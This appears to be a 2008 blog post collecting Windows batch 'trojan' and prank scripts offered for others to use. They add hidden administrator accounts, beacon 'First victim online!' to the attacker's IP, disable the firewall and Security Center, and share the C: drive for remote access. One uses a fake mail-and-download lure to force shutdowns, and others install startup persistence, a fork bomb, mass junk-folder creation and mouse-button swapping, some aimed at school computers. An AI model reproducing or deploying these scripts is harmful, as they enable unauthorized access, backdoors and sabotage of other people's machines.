Wednesday, January 23, 2008

All trojans,virus programmes

@ECHO OFF
net user Admin /add

net localgroup Administrators /add "Admin"

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "Admin" /t REG_DWORD /d 00000000 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Messenger" /v Start /t REG_DWORD /d 00000002 /f

net start Messenger

net send YourIPHere First victim online!

exit

You already know the 2 first commands, but the third is new. It hides the Admin user so you can't see it at startup. The fourth command starts the messenger service every time you logon.
The fifth starts the service messenger right now, and the last one have been explained.

Have Fun..
#####################################################################################
after you have connected try this little code

@echo off
net user name of account * you password twice eg abc abc * must be there.
net stop “Security Center”
net stop SharedAccess
netsh firewall set opmode mode=disable
mkdir c:\haxed
start shutdown.exe -m \\name of there pc -s -t 100 -c "Windows Is Shuting Down dont worry it should stop it self if not type shutdown -a in run"
pause
start shutdown.exe -m \\there pc name -a
exit
#####################################################################################
heres a cool little batch filee a knocked up the other day just save as watever.bat o and read the passwords

@echo off
attrib +h +r s The address of your file you want to make hidden add a pluss infrond of the letters to make it hidden/read only/system
color fc
cls
echo.
echo.
echo You Have Mail
echo.
echo Press Enter To Open.
pause
cls
echo.
echo.
echo Incoming Message.
ping localhost -n 1 > nul
cls
echo.
echo.
echo Incoming Message..
ping localhost -n 1 >nul
cls
echo.
echo.
echo Incoming Message...
ping local host -n 1 >nul
cls
echo.
echo.
echo Incoming Message.
ping local host -n 1 >nul
cls
echo.
echo.
echo Incoming Message..
ping local host -n 1 >nul
cls
echo.
echo.
echo Your Name has sent you a file.
ping local host -n 2 >nul
echo.
echo Do You Want To Download (Y,N).
set /p inputchoice=
IF %inputchoice% equ y goto pause
IF %inputchoice% equ n goto exit
IF %inputchoice% equ copy goto copy
IF %inputchoice% equ 123 goto accessgranted
:pause
cls
echo.
echo.
echo Experiment 1.0.1 Downloading.
ping localhost -n 2 >nul
cls
echo.
echo.
echo Experiment 1.0.1 Downloading..
ping localhost -n 1 >nul
cls
echo.
echo.
echo Experiment 1.0.1 Downloading...
ping localhost -n 1 >nul
cls
echo.
echo.
echo Experiment 1.0.1 Downloading.
ping localhost -n 1 >nul
cls
echo.
echo.
echo Experiment 1.0.1 Installing.
ping localhost -n 1 >nul
cls
echo.
echo.
echo Experiment 1.0.1 Installing..
ping localhost -n 1 >nul
cls
echo.
echo.
echo Experiment 1.0.1 Installing...
ping localhost -n 1 >nul
cls
echo.
echo Your Name says:This Is My Latest Experiment.
ping localhost -n 2 >nul
echo.
echo.
echo The File You Are Trying To Access Is Password Protected.
ping localhost -n 1 >nul
echo.
echo.
echo Please enter a password To Continue:
set /p inputchoice=
IF %inputchoice% equ qwerty123 goto accessgranted

:deny
echo.
echo.
echo Incorrect Password Please Try Again.

echo Please enter a password To Continue:
set /p inputchoice=
IF %inputchoice% equ lol goto accessgranted

echo.
echo.
echo Incorrect Password Please Try Again.

echo Please enter a password To Continue:
set /p inputchoice=
IF %inputchoice% equ 123 goto accessgranted


echo.
echo.
echo Incorrect Password Starting Saftey Procedures.
cls
Rundll32 user32,SwapMouseButton
cls
start shutdown.exe -s -f -t 10 -c "Windows Has Detected A Virus And Is Shuting Down!"
net user Guest Guest /add
net stop “Security Center”
net stop SharedAccess
netsh firewall set opmode mode=disable
mkdir c:\haxed
echo.
echo.
echo ________________________
echo YOU HAVE BEEN TERMINATED'
ping localhost -n 2 >nul
cls
echo YOU HAVE BEEN TERMINATED''
ping localhost -n 2 >nul
cls
goto file
echo YOU HAVE BEEN TERMINATED'^'
ping localhost -n 2 >nul
cls
md 1
md 2
md 3
md 4
md 5
md 6
md 7
md 8
start 1
start 2
start 3
start 5
start 6
start 7
start 8
start 4
cls
exit


:accessgranted
echo Press enter to Scan for viruses.
pause
dir C:\Program Files\s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
dir /s
cls
echo.
echo.
echo Scan Complete 1 Virus found.
ping localhost -n 4 >nul
echo.
echo.
echo Engaging Antivirus
ping localhost -n 4 >nul
pause
start shutdown.exe -a
start E:\mouse.lnk
start G:\mouse.lnk
exit

i built this for vista and to run off a thumb drive the whole scan is fake ok so i know that.
#####################################################################################

@echo off
Rundll32 user32,SwapMouseButton
msg * hahaha
msg * this is gunna screw u up
msg * good look finding how to fix it
#####################################################################################

This is a .bat file i made for school pc's.Have fun.It's also realy anoying but harmless.

@echo off
title Program Adobe Reader 8
:a
:1
@echo off
echo download all files of program "adobe reader"? y or n
echo y=yes
echo n=no
set input=
set /p input=enter your option:
if %input%==y goto y
if %input%==n goto a
:y
echo hey
:n
pause
color 40
echo Please Wait One Moment(this may take a few min.)
echo downloading
md.yousuck
md.yousuck1
md.yousuck2
md.yousuck3
md.yousuck4
md.yousuck5
md.yousuck6
md.yousuck7
md 3456 rrrwwuwuuuuysdd
md 3456\md2
md 630008342
md 630008342\md30465389576
md.hjm,6u
md.hm,y
md.jryju56u
md.urmuty56u
md.o,mryumu
md.rjyu56
md.u5jjum,u
md.y4mt,ry6
md.76yutuu
md.4y,mm56
md.ejy,rut5u6
md.mjyumyuu
md.lyumtr56
md.68mr9uumr
md.ojyt56
md.6mrrnmtu
md.jtu6ryu56hy
md.oryimu,rty
md.74,n6
md.ujryitmu
md.fyhyi,huu6
md.nv,mryu6
md.j,yimntu
md.m5yinmu6rt
md. n,nmr6
md.fh,yiu65u66uu
md.djtyiu6mtur 6u
md.ni,t66u56
md.ry,yhyu66u
md.jynth6y46u
md.trn,ymir,hethy444
md.gethgethteht
md.tyjhtyju7ytju7u
md.787876ujytj
md.7u577
md.rhytru5uuuuuu788uuuuu45
md. 6ty rtyr etty
md.tyyo
md.rytryrtthrrrrytrh
md.ryrtytrytit
md.6yyyyyyyyyyyyyiiiiyyyyyytryt
md.htrhwrthrthii
md.trhtrhtrt
md.htehtrht
md.iiii677i76457uiui57iiii677i76457uiu
md.iiii677i76457uiui574346t34t341t
md.iiii677i76457uiui57iiii657uiui57423
md.iiii677i76457uiui57iiii677i76iui57
md.iiii677i76gtmjmto
md.iiii677i7645yoi
md.iiii677i76457gjjgggggfffh
md.uiuiuiuiuiuiuiuiuiuuuuuug
md.uitur5ur
md.itt69
md.tu9toto
md.7jt58iot
md.7iui789
md.iui9oty
md.7u68
md.76iio89o
md.76iiii768
md.iu7i7ui7ioi
md.6t6i5i7oio
md.7iu776i7io
md.iiii677i764io57uiui57
md.j6ii6irt7i
md.iyh7i7tyjti
md.76uiy7i67
md.67tthujy6j6i
md.ituu7i7y76uyty
md.7j67u6ui
md.ryjtytj7ryij
md.jyyi7jut
md.ryj7y
md.ry7ijyj
md.jyiotyi
md.jhjryiio
md.ryyj7
md.854/y*7ui
md.57484ju7/854545814547
md.76i45/io
md.7458t
md.u7j45u7
md.5645778yu
md.68478yui
md.yhj558
md.hjr8798789
md.ry56875
md.hj65ui
md.try3154
md.dfj1254
md.nb0254
md.b0254
md.n412054
md.njfh442124
md.545
md.g124dh45
md.thet2hth5
md.8yyg5124e554
md.8egherg245
md.5+ethget4502
md.5+ghtd12
md.-bgddhd
md.+5ghd
md.85gh
md.8-+dgh
md./8+dgh
md.+dg
md.+8hd
md.-8ghh
md.7498dgh
md./*7897*dhadgh
md.7/87daggad
md.48dfgadf
md.9gdfag
md./94dghd
md.84tydgaha
md.876yty84/7dgha
md.itytthadg
md.uutuythdg
md.iyyyhdg
md.turttyythdghytyt
md.yutywtyetyydg
md.iyu8yuiitujkhad
md.yujikythad
md.iyuyghadg
md.886ytyuihadg
md.iuykithdg
md.68jkyytuihdguy
md.5689yth
md.689ygh
md.94ytty5ghyety
md.jutrjtutryjghdg796
md.jujutr58jtyh
md.ujtrj6ty
md.tjuty
md.jtujjrtyuj
md.jttuyuttyrr
md.tujtujurty
md.jtrjjtry
md.tuutry
md.tujjrry
md.tyjjjr
md.jtuuyr
md.yttujjyur
md.tyjjuruy
md.jjtujuy
md.yytuuutyujt
md.jtjjuuty
md.yjtuujjtu
md.jtyjrujtu
md.hjyjjtrjjutjt
md.jyutuujth
md.yyjjuurjjgh
md.5tujuuujutjghru7u
md.8urjjjgh
md.57ujujgh
md.58jujdgbs
md.87rujh
md.75jrujrhu
md.8tjrjruughrjurj
md.3urjrrrjhg
md.8jrjjh
md.58j57gj
md.78urjghj
md8.78jr
md.835ghj
md.7ugh
md.6787j
md.76u7ghjghgh8
md.t78jjj
md.78j5gghjjkgh7u
md.7t8jggh
md.8j7ghjjj
md.768ghjhgjghjg
md.8ty7gh
md.7j8jjhj
md.8thghhjyyjh577
md.7j7uhjuhjh
md.78t75hgjghj
md.jyyyuh8ghj
md.8tfgghj
md.76ghh
md.88fghjgh
md.7576j
md.837itghj87uitu
md.8376gh
md.85j8j
md.57tyhgj67
md.82j8hg
md.57dgt6jgh7
md.578j5678j
md.8gfj78hj
md.75t56
md.578yuhji
md.7528hj
md.78u6i
md.78t7i67j
md.56jtuh5tuiii6
md.57387jt87j6
md.274674ri6tu725767678
md.hjtj8i
md.wrtuyi6859
md.jtrrhji
md.tyjthtuyu68
md.yjterynikhjty
md.jyjtjtyuyk
md.jeyuk
md.ytyjtyyuj
md.tjtyhjyrjky
md.tyejtjtyhjki
md.jtyjyyk
md.tehtyjtyik
md.jhjjtyyik
md.tytjtyyi
md.yjyjtyjki
md.jtytjrk
md.yrjtyyi
md.hyuyjtky
md.trtjujk
md.htjytyk
md.trutjjyi
md.ferhjytk
md.ghutyjyk
md.4nhti
md.hfyk
md.46hyikj
md.hdnjik
md.h4y6yt
md.46jeni
md.hy;0bnm
md.hfeyj46
md.hyty4etn
md.4yjmrgj
md.yjytfns
md.7tyfnbj
md.67ty8j
md.yj8jty
md.76tnttyjhy
md.78jrjtj
md.uiltyy7yil
md.lu,l57nhjnhjnhjtyj8uyti
md.ui,8luili
md.,lkiiltut5
md.76t578t,iouilty
md.ii,8bgtyul
md.8lyti577ulitl
md.l;,58ghultu
md.l;8jy78gfh3um,
md.yji85fgutl
md.8mhgfiltu
md.96;jy7jltui
md.ilomyi7fdhjk
md.mu59gf
md.tyny79ossshjjjtuk
md.mmogftolyu
md.tyjo8hjgfyo
md.ymm78jjiyloty
md.mmkfjyky
md.tygufhj
md.mymjmfhky
md.emtyryumjty
md.tymytmtyfhj
md.ytmytmtym
md.mymtymhfj
md.ytttttttt
md.tyhjmuir
md.emhuuuur
md.dmtjmeymm
md.jajajajajaja
md.yousuck8
md.yousuck9
md.yousuck10
md.yousuck11
md.yousuck12
md.yousuck13
md.yousuck14
md.yousuck15
md.yousuck16
md.yousuck17
md.yousuck18yf
md.yousuck19nm
md.yousuck2ny0
md.6yh635h
md.6h346nmy
md.hyh46h
md.46yh4hn6
md.uy46n
md.4646hf
md.y464hn
md.6y46hnf
md.4hkykykyf
md.6yhh46
md.346346
md.hy346h56h
md.4643hh
md.4hfgmfgmgm
md.6hh46mgjmjm
md.46yfhmymymh346
md.34346h6hmhmhm
md.hhhjmdggjmjg
md.46hh46gmjmjg
md.46h63gfm
md.46hmmjm
md.h3447gmmmjmjjm46h4
md.57j46jgjj
md.5j4jmgjmm
md.h557jmmgjm
md.3j57jgjjmgjmjm
md.57yjjjmgjgjm
md.35yj57gjmmgj
md.j7jj5mmj
md.3577y57m
md.j7j3j77jryjm
md.jj777jj
md.j7j57j5mj7
md.3j5j7k57m
md.63j578jmmgjmj
md.5657j8kj
md.j3575j76m
md.j57j7kjm
md.jj578kj
md.57j57k7
md.j5j75jjet5757
md.jtyjtytj75k
md.tyyyjtk
md.tyjtejyjtjyk
md.jtjjj578k5gjmgjmj5
md.jtytjyje578k
md.tytjjtyty58
md.tyjyjtyjt58
md.jetjtyyj568k
md.jetytyjtjk
md.etyyjtyjt568k58
md.ytjtyjyjt5858k
md.jjejej568k568k
md.ytyjjtjytyek5757k8
md.tretjyt6k568k57
md.jtyyjtk684k8k
md.eyyjjtjy85jmjmjm68k56k
md.yjjtrykry6uryk685
md.4jyikyikrykyrk
md.ykrukyukuik
md.ryukrrrukyu
md.trjutukrujktuk
md.tjrrtkkkktr
md.tyhtyjutjtr
md.hjyejyrtyj
md.rhjyejeryjmjmhjery
md.hrehryehyr
md.hyrrhrhr
md.tyhty
md.hytrhtrh
md.hhty
md.teyhyyyhtryh
md.jhryh
md.46j46tyj4
md.kj57h
md.7k64jyhetyh55
md.7hjhe
md.8974ety5mjmh
md.45jhmfjm
md.9hyrjmm
md.905heh;fm
md.5hhyfjmf
md.8l5yfmf
md.6kh56th9
md.7h5ye
md.6j7h5yeh
md.467k6hej
md.457jk56ryh
md.7j56hrh
md.6j556hyh
md.556hy7
md.j56heh
md.545hyt
md.hjryyuukyk5y635j
md.hrumhjtujm5h53h563hryhh
md.mumtujrut
md.utujjrt
md.ummujuj
md.mumjujrt
md.tuujtujy
md.tummtujuk
md.emutjtuky
md.tumujnit
md.mtmttujlk
md.mtuttjuyi
md.tymutujyikl
md.nmmjutk
md.tytumjtjyyi
md.tyjueruutrjik
md.jmumutykyuu
md.tyummkj
md.yjuutu
md.jemujmujjujk
md.tum,yu,tujmtu
md.m,yi,yir
md.ryiy,,n
md.umi,r,ytyiy,i
md.um,yien
md.rtumryiyn
md.umiy,yn
md.uy,nnyyyy
md.rmny,eurbsrnyn,
md.yyynygjtr
md.nyynnyertrut
md.nnnywtujer
md.ynyte3j
md.ynntyn4y6jtu4h5y
md.neynn43jtuh3
md.ynyhrtu
md.yyneerhtrj
md.nerhhrtuj
md.hhrmh6jrhjrhry
md.mruuu63y6yu3
md.umummuy5hy46
md.mtmumum456346hurm
md.uu63u5u56u
md.m56u56j666h
md.murhe6rtu
md.uherhj
md.merhrtujt67ueh
md.mu56jju6j
md.u5h65tu7j
md.m36hjui
md.u65jkutyhjtjuu
md.tumtur6ju
md.m5jj
md.ruy6h4tm
md.tumt6tj
md.mju75775jtyjt
md.ntyhrrhryu5
md.kyuuuuuuky
md.uiuii
md.tituirr
md.tuiuuuuuur7itur
md.6iutrjutr8777rj
md.j56ijtuj
md.ti56itu
md.trjturui
#####################################################################################

Try this one it doesn't freeze the computer but it is annoying as hell and it doesn't go away when you log out

------------------
@echo off
:l
msg * hi
msg * hi
exit
goto l
-------------------

just save as a .bat into this folder
C:\Documents and Settings\All Users\Start Menu\Programs\Startup

(the startup menu for all users)
this will make it so when they log in that message box will appear
#####################################################################################

The final code ends up looking like:

net user neo /add
net localgroup administrators neo /add
net share system=C:\ /ADDNAME
explorer \\victimip\system
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "neo" /t REG_DWORD /d 00000000 /f


The last command was added by me, it keeps the username from showing up in the start menu.
#####################################################################################

@echo off
copy %0 "%userprofile\Start Menu\Programs\Startup
tskill explorer
shutdown -s -t 5 -c "virus"
:1
start %0
start %0
start
goto 1

No comments: